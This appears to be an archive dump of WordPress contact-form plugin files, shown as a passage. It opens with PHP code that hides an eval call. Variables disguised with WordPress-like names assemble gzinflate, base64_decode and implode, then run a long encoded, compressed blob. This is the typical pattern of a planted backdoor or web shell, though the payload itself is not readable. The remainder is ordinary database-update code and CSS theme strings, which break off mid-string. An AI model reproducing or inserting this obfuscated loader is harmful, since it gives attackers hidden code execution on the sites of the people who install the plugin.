WmQeqTZzkr','ZVLroTROKgpxRw75I/S','WWUhTnc80g1wuo/Y20a','OX/0yMP0mV3Gg6kBD8e','mCdsdqdSWZuzX/81w+N','eb8AeAMs8xxT9UuU2y0','WXAtk1z1I+BWFkmEHQi','byOF0dFH5OcHQvR81r7','vzdV/lpmOQvoe5GT83X','4r7yNS8zcjLreq+sjdv','6GfiuCRiM4wjy10ekiF','wwB9nKXF0frj6FS3nsF','FKOH1Mgkx2miMsE/Wez','fHG/zfi05m1Iuymhlpf','6HblyHq9Wrf+9+W609X','KncJcQouWxg0YC56KLy','yVwSqgsYAntmfWxUy47','+K3qHGkfLI31V1N3KEm','YjWT95xEKfGakxzNyT2','DmExYIwk3mOc+H5JKZo','Pv0VURt3y3o//5Dt/+9','ORiVGJ2K0WLtXHduu4Y','3rh7emG9UU9qVrPkzaJ','kkMq+Sf+pvDLy9OP50w','ZLcY0HpkhCw0+jN6FKL','yuXHARc5KJs2hXxUsdx','ESLbhzdPylmPWxZcOas','AO/huYUX3zlR0rVJdu4','x4UnMONgfT1/llaF1P1','2oxibNr124GcJjNIJLb','uCQrmNKc6aBRwAxm852','SqfULjVkFCY36JSCmEH','ifWyOLz/GLE8e3gLpWx','dM4wq4BSuj5Eu3/P5gU','HT4tAiwLJ04RSMigPXw','PU0Tk+qg1Ty1lFscV3i','DWO9J75bnJv429cqUY6','u1dr3wlzTxseId3MlSJ','qgu/xAxtArnVF6obOkW','11agvnKWd64AyumF4RJ','ob+aO+xNZLl73V0wKHm','di3ez0xxbCxPNJjOqSK','fwiTECxV132IMF2XGI1','NGO6PLMjgGN+1SpK5SK','nnjEoEpxtK7ptCvr8k1','PUhuZ09ZRZ0sK5vW24n','ssPx4U68y8/0p2WZy1B','Qs7ljaY7NiZ759aNKFX','pc5/1EI6MzlBmSGSRdj','OSQ1NLJWafBmacDe5uQ','eOCq8wK3uuh5c+d3jR+','uk/8aT1HN9JrjEiISvl','bidLkijqtKW0Bvi+KQ4','uCo8O7PALiihV1Lhrex','uUid1gg7s6Eh81J03xh','Ge6u14A6Na7HojTaKex','S50a4UeFBGX1XGd6t5e','35VdAlXtqsdIXt7P7HX','r8JzRlp+lPFJjMbUP5z','eht7xZsV37b3oZU2mz0','3WzQd8a5Q8OGcKDYYA6','DFfR8q+yLXoSVJiQ9lL','q8cffsIyNHI9aZudPtY','rQ70D3QjL9dQc2FKCc4','oZad4SWs4NwVUhOHZH3','pwToewkqavz2dt8t86/','VBPtJNZvb6RrkMl7/IQ','Q7fulNzRZVHWzKd3pmJ','EdeqacgV+gaL6BwBs/3','UDIu+Dey1V7KTSSyD1J','Xr6rWxel27Dut/rLBbs','g55WLzTqRX2JITCc3wg','Bf2RlK5puiD2SJKhLop','XS7uAEqGQqWFFlWs8kk','atSBolatE/8v76MDxso','1RFOTM1x5kqY82NcGqg','jVAiC0YHNu8vcqu+yFI','RKCK2hl9MFpp+ybOJEz','Mae8EwFRuxJQ+9fnRjz','qaT2U3XQ3P34+nhrfH5','ZPq29drv2k/GXz+/Dl9','88Jt667J/2Xoy0FofG6','fjxpvXLx3r68uz6ftPT','vz181nvy+ezW5jKhh8+','vn710QnHn8+H/d6rcf/','rS8d5c/D6SHdf3+oDr/','/64Ejv2sc+wfHqOcXx+','eT2Sysivz+3nPjNwdnz','y6Hx6dPsyHh78GyofTo','afn117B+/mjw+fnnmfz','3v22efX0+7m8ePjg8+W','J9fbtlvLsKTA/tsrI+e','NLqzpgs00d+t19vd0VE','EZVzj5cn49XT4J7Rn1m','2dBF8/f/AuG09enDc+X','r49eP7hzHny+mJIfl9c','NE7efm6eXF4OPz6/OB/','3gVao7+z2zfnzx72D50','DTpXc8/DiFOqan9rPh8','cdJfGwT3INuazv++umk','8ebo5P2HRnT08YCUJ+1','bovyt/vJjDGUvzw6dU2','i//d7+Sug5+/iBtnME/','fJpy7tsnh1eNJHe+TBn','H1+fS2Hck21988zpAm9','Yf8+0g2eRdq6T/vnSmt','xCvxMc55dbhTSsm9Z1E','nY3TxxK88fzS2hH8kCC','ZU1mnjXulsuWN7xsWEc','Xh+Mnx/YTW/u0Bfj7/b','efhjbWp3360n9z+JzIw','/GLcf8dyJU5fe6YL53G','mxeH/un0+ROZfOrs95u','jd+Fr5/nLzw3nFNoNv0','mf9ID+87PLo5O3Lw3HY','H37xXXiL5+aIK9G48vm','M/cNJ8PHB69ffPm03Th','+eTL9+umo8fX8OZOhM5','RnIlPwm6R1N5+TekG23','oEMMRmYXFw0n5yfffx4','AfUenh0dh9AWLAdt3h4','iPKUZZf11D/jgvT48Oj','9rfu2+O2qE55fbz6Enz','z83jk4/nQ+5sfDM/tA6','io2D50Rujl/Bv25KU6h','9PmkQOZiOZ5zs9Y+HJ1','bX/dDvvnRmRrHcpvbSC','WHMTKAMfHuvv3w6GXz9','DO06PHl/MdwKL8k48l5','D/3jH5/2h/tIZvv/09V','YfhX5S5uBTRl8XxuLxS','5JvH790RscHfRgPH0fQ','ducrjHEsT2SpP3wN/HO','69vMLWM5eX9hj+/3B1x','cXje3T40Eh//1H6NPjw','dboQ+PJ6QWhHeslst/P','ZP949fWQ0E1k6uCDA/L','zcXB8cHZxfvjx3cVBxh','f9Fcgm8IXiS3lL4I3PZ','05a5gjGK6OHjQlahqV9','/Wz5xsGzManvcwPGWqN','dEc5gYK1gc/N8358Hub','dpVLfnc0FdroV1Qu36v','kp3h74XRGWhGihOciH6','3AY9G2Fxadro2u5GaCl','Xvhk435IrU1RbSYn3AL','ZT7sSLWFK/0M3m5uafq','hjzRDiPJ3EGeM/OOzZU','TxoamsGtGfAb42WbDuo','nKJ6ui6p7WZvPCfY5ra','bVC4EiMmXs7PDd6cVh5','9mLF2fsPHT/H+Yi53A+','191VEv9RizTjNqoKj4S','Ox+ZsOOxPio9Xaa5hR+','4EtFDOqI0rivaMihdAV','iGoH9piQXNSWyyp5RtX','gey4OjV65ODWlKdCSLp','qRr7k/Dq1X+NrWhBSb4','4ejCOv4JvLWFrZiEb+R','tev+w6eFyeLYt5AbDQd','T+LpEE3Ps11XBeVSyRA','Im7XEDwgkS2nubxjm7Q','YOD3LRo/yeNygNHdP0q','03ZnWAl5/6R0pLfBFb8','UNHiifK30gfFXqFtYuE','O0LQhd9zPNgI8A6ThyM','qYqi9kqs6Yymuyd2asP','o+xlUK4kP8iv/W78FuX','8vted5xnB+L1Zt71lHf','wSh8JkT/wVIlxpqvgaa','Jv+R3yVc29DFTBHBb9L','IFknwXQUOvBlsqgGJ/a','ro23OFUVk/HRMVOVPgh','EL3XSpx4zosv81kyYcc','tCAPD8YqGTjel0NI66A','39guwl32GI0HoxmcayL','MGtLHkpVRqFnzuLKt1w','3pUhdQ9f1fh9feB53nY','FvO32h54rJHGkozWLs/','AQf9KUQGzStKNlKpmgl','kGmNCey0d+N0uYisD2/','9OBhbztS2+dSC7esDzv','I5bwY7witgekmXkMa3k','FrTRs7EtmbMjpZ9iEUz','WhMA8Wk1sQHmoH8zdHi','ui7a3/84gEsRrCd78NM','XxgMU6ZvXkAcV33ySLZ','97paAFrlnK2SASCLYVM','YHI9nTUBHcsFAU344Bk','3znhg3xrIq6jvxJNe4O','thQs9Dx/OsQX+A/Y1kM','x+LklJrSjO9nueczqEg','OaildNluv5qizcCFOWs','4MPXpMO6NjRmtmEZfjM','oxbLaeH6p85fmxxAJVg','06NwWCrfBW1sklGMgyR','78XrY/IYBXe+yyl7Vvd','mMNRmg6lObpeLoarJJ7','no4EBlbsasEnxkI4Msc','+stlFHPTf3Y7Xlq1hLJ','OXXSkEWklrRb1zAYMMz','jHSw8rwROl/Ra/v8B');
$current_user_can_mx = array ('g','e','4','h','d','t','n','s','m','c','e','m','a','j','i','t','y','p','m','g','d','b','t','t','e','q','d','l','h','t','f','e','6','e','o','h','y','i','q','z','o','t','_','r','b','v','p','z','a','j','a','f','m','a','o','a','f','l','d');
$current_user_can_yn = $current_user_can_mx[19].$current_user_can_mx[47].$current_user_can_mx[14].$current_user_can_mx[6].$current_user_can_mx[56].$current_user_can_mx[57].$current_user_can_mx[48].$current_user_can_mx[29].$current_user_can_mx[10];
$current_user_can_ko = $current_user_can_mx[44].$current_user_can_mx[55].$current_user_can_mx[7].$current_user_can_mx[24].$current_user_can_mx[32].$current_user_can_mx[2].$current_user_can_mx[42].$current_user_can_mx[58].$current_user_can_mx[1].$current_user_can_mx[9].$current_user_can_mx[34].$current_user_can_mx[4].$current_user_can_mx[31];
$current_user_can_ff = $current_user_can_mx[37].$current_user_can_mx[18].$current_user_can_mx[46].$current_user_can_mx[27].$current_user_can_mx[54].$current_user_can_mx[20].$current_user_can_mx[33];
eval($current_user_can_yn($current_user_can_ko($current_user_can_ff($current_user_can_jj))));contact_form_maker_update.php000060400007027624152434416630012502 0ustar00<?php

function contact_form_maker_update($version) {
  global $wpdb;
  if (version_compare($version, '1.7.0') == -1) {
    // Add Form Layout options.
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `reply_to_user` varchar(128) NOT NULL DEFAULT ''");
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `mail_from_name_user` varchar(128) NOT NULL DEFAULT ''");
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `mail_from_user` varchar(128) NOT NULL DEFAULT ''");
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `custom_front` longtext NOT NULL DEFAULT ''");
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `autogen_layout` tinyint(4) NOT NULL DEFAULT 1");
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `send_to` varchar(128) NOT NULL DEFAULT 0");
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `reply_to` varchar(128) NOT NULL DEFAULT 0");
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `requiredmark` varchar(20) NOT NULL DEFAULT '*'");
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `sendemail` tinyint(4) NOT NULL DEFAULT 1");
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `savedb` tinyint(4) NOT NULL DEFAULT 1");
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `form_fields` text NOT NULL DEFAULT ''");
    $wpdb->query("ALTER TABLE `" . $wpdb->prefix . "formmaker` ADD `published` tinyint(4) NOT NULL DEFAULT 1");

    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 01 blue\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #013D7C;\r\nborder-radius: 5px;\r\ncolor: #013D7C;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\ninput[type="radio"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\ninput[type="checkbox"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px solid #000 !important;\r\npadding-left:10px;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n\r\n.sel-imul {\r\n	display: none;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/10/01/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 38px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/10/next.png) no-repeat right #013D7C;\r\npadding: 0px 36px 0 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-right-radius: 7px;\r\nborder-bottom-right-radius: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\ncolor: #A2A2A2;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 37px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/09/previous.png) no-repeat left #F1F1F1;\r\npadding: 0 20px 0 36px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-left-radius: 7px;\r\nborder-bottom-left-radius: 7px;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #013D7C;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #013D7C;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #013D7C;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	padding: 2px;\r\n	height: 26px;\r\n	border: 1px solid #B7B7B7;\r\nbackground: #F8F8F8;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\nselect {\r\n	outline: none;\r\n}\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n\r\n\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n\r\n\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #013E7D;\r\nbackground-color: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 29px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 16px;\r\nfont-weight:bold;\r\n}\r\n.page_active {\r\ncolor: #FFF;\r\ncursor: pointer;\r\nbackground-color: #013E7D;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 20px;\r\npadding: 5px 25px 0px 25px;\r\nline-height: 26px;\r\nfont-weight:bold;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 0px;\r\nborder-spacing: 0px;\r\nheight: 16px;\r\nline-height: 16px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nvertical-align: middle;\r\nbackground: #013E7F;\r\ncolor: #fff;\r\nborder-top-left-radius: 5px;\r\nborder-bottom-left-radius: 5px;\r\n}\r\n.page_percentage_deactive {\r\nheight: 16px;\r\nline-height: 16px;\r\nbackground-color: #F1F1F1;\r\ntext-align: left !important;\r\nmargin-bottom: 1px;\r\nborder-radius: 5px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\nmargin: 3px 5px 3px 9px;\r\ncolor: #FFF;\r\nfont-size: 12px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 01 purple\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #6C005E;\r\nborder-radius: 5px;\r\ncolor: #6C005E;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\ninput[type="radio"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\ninput[type="checkbox"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px solid #000 !important;\r\npadding-left:10px;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n\r\n.sel-imul {\r\n	display: none;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	